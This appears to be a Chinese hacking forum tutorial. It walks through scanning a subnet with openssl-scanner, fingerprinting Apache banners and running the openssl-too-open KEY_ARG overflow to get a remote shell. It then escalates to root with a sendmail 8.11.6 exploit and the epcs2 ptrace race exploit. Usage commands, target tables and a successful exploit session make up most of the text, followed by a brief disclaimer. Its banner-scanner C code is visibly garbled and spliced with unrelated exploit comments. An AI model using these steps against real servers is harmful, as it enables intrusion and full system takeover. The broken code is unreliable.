apache_openssl漏洞的利用及权限的提升
apache_openssl漏洞的利用及权限的提升--nightcat
转载请保持文章完整
第一部分:获得shell.
在packetstorm玩了一段时间,遇到有openssl-too-open.tar.gz这个exploit.
现在看看软件包的描述:
OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more> 这个描述说明这个exploit 是openssl v 0.9.6的key_arg的漏洞来达到溢出的目的。不过也要
注意apache/mod_ssl的版本信息。对于大多数的有这样条件的都能溢出成功。取得一个id是
nobody shell,有些甚至是root的权限。软件包里面有一个扫描器,exploit。
好象听起来很诱人,down回来研究一下。
nightcat@nightcat$tar -zxvf openssl-too-open.tar.gz
nightcat@nightcat$cd openssl-too-open
Makefile README linux-x86.c main.c main.h scanner.c ssl2.c ssl2.h
习惯性的要读一下软件包的REAMDE文件。
nightcat@nightcat$ more README
得到一些有用的信息:
1.编译的方法:
直接make就可以,之后就可以得到openssl-too-open和openssl-scanner
2.openssl-too-open的用法:
Usage: ./openssl-too-open
-atarget architecture (default is 0x00)
-pSSL port (default is 443)
-copen N apache connections before sending the shellcode (default is 30)
-mmaximum number of open connections (default is 50)
-v verbose mode
Supported architectures:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)
/****想成功,就要看准系统类型 和apache版本号
*****如果是 0x07 - RedHat Linux 7.0 (apache-1.3.12-25):
*****./epenssl-too-open -a 0x07 ip .就应该可以啦!
****/
3.openssl-scanner的用法:
Usage: ./openssl-scanner
-ifile with target hosts
-ooutput log
-a append to output log (requires -o)
-b check for big endian servers
-C scan the entire> -d debug mode
-w N connection timeout in seconds
Examples: ./openssl-scanner -d 192.168.0.1
./openssl-scanner -i hosts -o my.log -w 5
./openssl-scanner -C 192.168.0.0
/****扫描一个c类的ip
*****./openssl-scanner -C 192.168.0.0
****/
4.一个实现例子:
$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse
Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done
192.168.0.136: Vulnerable
$ nc 192.168.0.1 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html
./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse
: Opening 30 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x810b3a0
ssl1 : 0x810b360
ssl2 : 0x810b4e0
* Addresses don't match.
: Opening 40 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x80fd668
ssl2 : 0x80fd668
* Addresses don't match.
: Opening 50 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x8103830
ssl2 : 0x8103830
: Sending shellcode
ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
Reading tag
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;> Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07
USER TTY FROM LOGIN@> bash-2.05$
整个README 文件已经说的很明白了:
现在是总结一下实现的过程:
1.通过openssl-scanner来扫描一个c段的ip,找到有漏洞的主机,
2.用nc的方法查找banner得到三个目标内容:apache的版本号,openssl的版本号,操作系统版本3.在通过openssl-too-open来进行溢出得到一个shell.
其中第二步,我写个程序,可以方便得到banner.
/* the www banner scanner .80scanner version 1.0
*
* check for the enter ip or daemon to get the banner
*
*to complie:
*user$gcc -o 80scaner 80scanner.c
*
*to use:
*user$./80scanner somedomain.com (i.e. ./80scanner antionline.com)
*
*coded by nightcat
*march 2004
*
* */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int main(int argc,char *argv[])
{
int s;
struct in_addr addr;
struct sockaddr_in victem;
struct hostent *bad;
char buffer;
if (argc!=2)
{
exit(printf("\nUsage:%s domain.com \n",argv));
}
if ((bad=gethostbyname(argv))==NULL)
{
exit(printf("Error getting hostname\n"));
}
printf("check web server version\n");
printf("coded by nighcat\n");
system("sleep 2");
s=socket(AF_INET,SOCK_STREAM,0);
if(sh_addr,(char *)&victem.sin_addr,bad->h_length);
victem.sin_family=AF_INET;
victem.sin_port=htons(80);
if(connect(s,(struct sockaddr*)&victem,sizeof(victem)) * will not work since the register will not point to pvpbuf. What we do is overwrite two
* bytes with 0x005c. Then we fill up the stack (by passing a long argument) so we lower the
* address of pvpbuf untill it is in the range of the ebp. Also our shellcode will be at a low
* stack address < 0xbffefefe (since we cannot write 0xff in pvpbuf).
*
* NOTE: sendmail 8.12.8 cannot be exploited this way since there is an assert() which cannot
* be bypassed (in sendtolist()).
*
* have fun
*
* Greetz: Knight420, Stefano Biondi, nevez
*
只要利用prescan()函数长度检查问题
2.详细用法:
Local sendmail 8.11.6 exploit by sorbo (sorbox@yahoo.com)
Usage: ./sendmail
-h this lame message
-t target
-b brute force
Id Description pvpbuf zero chunk shellcode addr
0) Slackware 8.0 0xbffdfef4 0xbffe15d6 0x80f30a0 0xbffe1f36
1) Redhat 7.3 0xbffdfcd0 0xbffe19a6 0x80f30a0 0xbffe1f36
2) Redhat 7.2 0xbffdfcd0 0xbffe19a6 0x80f30a0 0xbffe1f36
如果是redhat7.2 简单执行:
./sendmail -b -t 2 就可以得到root.
另一个是epcs2.c:
/*
* epcs2 (improved by lst )
* ~~~~~~~
* exploit for execve/ptrace race condition in Linux kernel up to 2.2.18
*
* originally by:
* (c) 2001 Wojciech Purczynski / cliph /
*
* improved by:
* lst
*
* This sploit does _not_ use brute force. It does not need that.
* It does only one attemt to sploit the race condition in execve.
* Parent process waits for a context-switch that occur after
* child task sleep in execve.
*
* It should work even on openwall-patched kernels (I haven't tested it).
*
* Compile it:
* cc epcs.c -o epcs
* Usage:
* ./epcs
*
* It gives instant root shell with any of a suid binaries.
*
* If it does not work, try use some methods to ensure that execve
* would sleep while loading binary file into memory,
*
* i.e.: cat /usr/lib/* >/dev/null 2>&1
*
* Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4
* This exploit does not work on 2.4.x because kernel won't set suid
* privileges if user ptraces a binary.
* But it is still exploitable on these kernels.
*
* Thanks to Bulba (he made me to take a look at this bug ;) )
* Greetings to SigSegv team.
*
* -- d00t
* improved by lst
* props to kevin for most of the work
*
* now works on stack non-exec systems with some neat trickery for the automated
* method, ie. no need to find the bss segment via objdump
*
* particularly it now rewrites the code instruction sets in the
* dynamic linker _start segment and continues execution from there.
*
* an aside, due to the fact that the code self-modified, it wouldnt work
* quite correctly on a stack non-exec system without playing directly with
* the bss segment (ie no regs.eip = regs.esp change). this is much more
* automated. however, do note that the previous version did not trigger stack
* non-exec warnings due to how it was operating. note that the regs.eip = regs.esp
* method will break on stack non-exec systems.
*
* as always.. enjoy.
*
*/
只要利用了execv/ptrace的条件竞选。
2.用法:
* Usage:
* ./epcs
这个的用法是可以直接执行:
./epcs 就可以得到root. 如果出现enjoy 那就说明可以得到。
第三部分:小结
/*****尽量多的了解你能了解的一切****/
要说的就是:
要明白你所利用的工具的功能,及了解为什么能这样利用。才是我们的真正目的。
***只是理解其中道理的一个方法,不要利用我介绍的东西,搞破坏,这个不是我
写文章的目的。
页:
[1]